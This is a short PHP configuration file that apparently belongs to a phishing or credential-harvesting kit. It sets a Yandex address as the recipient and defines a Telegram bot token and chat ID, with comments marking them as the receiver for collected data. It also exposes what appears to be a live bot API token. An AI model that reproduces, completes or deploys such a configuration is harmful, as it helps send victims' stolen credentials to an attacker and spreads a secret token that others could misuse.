<?php

$recipient = "henroozdc@yandex.com";

$settings = array(
	"telegram"		=> "1", // Telegram Bots Receiver
	"chat_id"		=> "1185176021", // Chat ID Of You
	"bot_url"		=> "6807856846:AAGtSX6TLluawwnWtnAeCIxna-VzgNTGlxU", // Your Bot API Key 
);

return $settings;
?>